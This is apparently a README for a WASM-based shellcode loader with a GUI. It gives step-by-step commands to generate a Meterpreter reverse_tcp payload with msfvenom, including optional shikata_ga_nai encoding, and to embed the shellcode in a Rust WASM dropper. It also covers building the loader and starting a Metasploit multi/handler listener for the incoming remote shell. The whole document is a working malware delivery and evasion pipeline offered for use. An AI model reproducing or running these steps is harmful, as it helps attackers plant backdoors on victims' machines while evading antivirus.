This project provides a WASM-based shellcode loader with an optional GUI for automation.
For the easiest experience, use the included GUI that automates all manual steps:
cargo run -p wasm_guiThe GUI will guide you through:
- Tool installation and verification
- Payload configuration (IP/Port)
- Complete build pipeline automation
- Error handling and status updates
See wasm_gui/README.md for detailed GUI documentation.
cargo install wasm-packcurl -L -o wabt.tar.gz https://github.com/WebAssembly/wabt/releases/latest/download/wabt-1.0.37-windows.tar.gz
mkdir wabt && tar -xzf wabt.tar.gz -C wabt --strip-components 1curl -L -o wabt.tar.gz https://github.com/WebAssembly/wabt/releases/latest/download/wabt-1.0.37-ubuntu-20.04.tar.gz
mkdir wabt && tar -xzf wabt.tar.gz -C wabt --strip-components 1- First, we need to get some shellcode from Metasploit
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f rust # -e x86/shikata_ga_nai -i {number of iterations} # OPTIONAL (For heavier encoding) - Copy the output from that command into
./wasm_dropper/src/lib.rs - Name it
WASM_MEMORY_BUFFERand change the const to be static WASM_MEMORY_BUFFERshould have the following signature:
static WASM_MEMORY_BUFFER: [u8; WASM_MEMORY_BUFFER_SIZE] = [
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,
...
];cd wasm_dropper && wasm-pack build --release && cd .../wabt/bin/wasm2wat.exe ./target/wasm32-unknown-unknown/release/wasm_dropper.wasm -o ./wasm_loader/src/wasm_dropper.watcd wasm_loader && cargo build --release && cd ..use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
set LPORT <your_port>
set EnableStageEncoding true
exploit -j